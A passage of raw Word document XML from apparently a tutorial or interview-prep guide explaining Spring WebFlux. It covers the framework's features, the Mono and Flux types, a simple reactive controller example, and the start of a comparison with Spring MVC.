        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Want a quick sample comparing traditional vs reactive in code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B34F11" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00484F1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C33B964">
          <v:rect id="_x0000_i2204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1A366" w14:textId="325C9617" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00163F3B" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="_Toc196307964"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00484F17" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w14:paraId="2FF3E33B" w14:textId="4AF10ACA" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a reactive, non-blocking web framework introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is designed to handle asynchronous, event-driven applications using </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fewer resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6111CB" w14:textId="77777777" w:rsidR="00454E0F"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40A69AC">
          <v:rect id="_x0000_i2205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F47DE6" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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Key Features of Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EC2A4"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Reactive Programming Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Project Reactor (Mono, Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDB822"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Built on </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servers like Netty, Undertow, or Servlet 3.1+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DF725"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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional and annotation-based programming styles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F3DF5"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Ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818889D"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Integrates with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a non-blocking alternative to RestTemplate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703DDA1B" w14:textId="77777777" w:rsidR="00454E0F"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E84B032">
          <v:rect id="_x0000_i2206" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE52D4E" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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Core Compon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67"/>
        <w:gridCol w:w="3127"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1F18EC72" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6607C799" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5381369C" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="60142418" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A3388DD"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Mono&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461649A5"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Represents 0 or 1 result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="28C94620" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB98ECC"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Flux&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA81F66"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Represents 0 to N results (stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3B114B1A" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C940AB2"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RouterFunction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666B3D08"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Functional route definitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="5BE2CA1E" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="217AED34"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WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EAA5AF"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Non-blocking HTTP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2670CCCC" w14:textId="77777777" w:rsidR="00454E0F"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368374C">
          <v:rect id="_x0000_i2207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D772A" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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Simple Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128163EC"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E30A29"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public class HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09098DEE" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E969E6E"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    @GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348B9EE"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    public Mono&lt;String&gt; sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18119C61"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        return Mono.just("Hello from WebFlux!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A90290"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4508A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08228C49" w14:textId="77777777" w:rsidR="00454E0F"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01E1CE0">
          <v:rect id="_x0000_i2208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C914E" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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When to Use Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F2D6F"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EDBD4"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When handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7954526B"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with reactive data access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EABD32"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Real-time apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>notifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268F769" w14:textId="77777777" w:rsidR="00454E0F"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E46950B">
          <v:rect id="_x0000_i2209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE86597" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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Difference Between Spring MVC and WebFlux</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8"/>
        <w:gridCol w:w="2627"/>
        <w:gridCol w:w="2709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="2873CB50" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518E21CE" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B3AE68" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C36AC11" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="110646E7" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4B8C4F"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Programming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
